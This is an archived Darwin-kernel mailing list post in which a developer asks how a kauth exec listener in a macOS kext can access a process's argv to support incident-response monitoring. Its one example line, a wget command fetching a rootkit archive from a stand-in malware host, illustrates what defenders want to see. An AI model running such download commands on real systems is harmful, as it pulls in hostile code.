• Open Menu Close Menu
  • Apple
  • Shopping Bag
  • Apple
  • Mac
  • iPad
  • iPhone
  • Watch
  • TV
  • Music
  • Support
  • Search apple.com
  • Shopping Bag

Lists

Open Menu Close Menu
  • Terms and Conditions
  • Lists hosted on this site
  • Email the Postmaster
  • Tips for posting to public mailing lists
accessing argv on exec
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

accessing argv on exec

  • Subject: accessing argv on exec
  • From: Peter Moody <email@hidden>
  • Date: Mon, 10 Nov 2014 15:02:10 -0800
Hey folks,

apologies for what will likely be a noobish question, I'm just getting
acquainted with xnu and kexts and all that.

I'm interested in monitoring process creation (and termination) on the
mac. It looks like I can use a kext that registers a listener for
kauth_fileop_exec to be notified of an exec, and the callback is:

 a) given a char* of the path the binary.
 b) run in the context of the newly executing binary (so proc_self()
 and the like work for getting pid/ppid, etc).

but is there anyway that I can actually access the argv that was passed
to the execve call?

I'm trying to do this to help our incident response capabilities, where
obviously just seeing that 'wget' was called is a lot less informative
than seeing 'wget http://malware.badguy/rookkit.tgz'

 Cheers,
 peter
 _______________________________________________
Do not post admin requests to the list. They will be ignored.
Darwin-kernel mailing list      (email@hidden)
Help/Unsubscribe/Update your Subscription:

This email sent to email@hidden
  • Follow-Ups:
    • Re: accessing argv on exec
      • From: "Jay O'Conor" <email@hidden>
    • Re: accessing argv on exec
      • From: Evan Lojewski <email@hidden>
  • Prev by Date: Debugging a core dump using lldb
  • Next by Date: Re: accessing argv on exec
  • Previous by thread: Debugging a core dump using lldb
  • Next by thread: Re: accessing argv on exec
  • Index(es):
    • Date
    • Thread